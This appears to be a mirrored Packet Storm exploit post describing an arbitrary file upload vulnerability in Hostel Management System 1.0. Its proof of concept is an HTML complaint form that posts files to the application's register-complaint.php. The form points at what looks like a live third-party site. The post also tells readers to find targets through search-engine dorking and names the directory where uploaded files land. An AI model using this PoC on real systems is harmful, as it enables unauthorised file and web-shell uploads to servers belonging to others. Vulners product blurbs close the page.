Lucene search
K

Hostel Management System 1.0 Arbitrary File Upload

🗓️ 02 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 210 Views

Hostel Management System 1.0 Arbitrary File Upload vulnerability in phpGuruku

Code
`=============================================================================================================================================  
| # Title : hostel management system 1.0 arbitrary file upload Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://phpgurukul.com/hostel-management-system/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Line : 9 Set your Target  
  
[+] Save As poc.html  
  
[+] payload :  
  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Complaint Form</title>  
</head>  
<body>  
<form name="complaint" action="https://guardianpg.in/hostel/register-complaint.php" method="POST" enctype="multipart/form-data">  
<label for="ctype">Complaint Type:</label>  
<select name="ctype" id="ctype">  
<option value="type1">Type 1</option>  
<option value="type2">Type 2</option>  
<option value="type3">Type 3</option>  
</select><br><br>  
  
<label for="cdetails">Complaint Details:</label><br>  
<textarea name="cdetails" id="cdetails" rows="4" cols="50"></textarea><br><br>  
  
<label for="image">Upload Image:</label>  
<input type="file" name="image" id="image"><br><br>  
  
<input type="submit" name="submit" value="Submit Complaint">  
</form>  
</body>  
</html>  
  
[+] your Files : http://127.0.0.1/Hostel-Management-Syste-Updated-Code/hostel/comnplaintdoc/  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation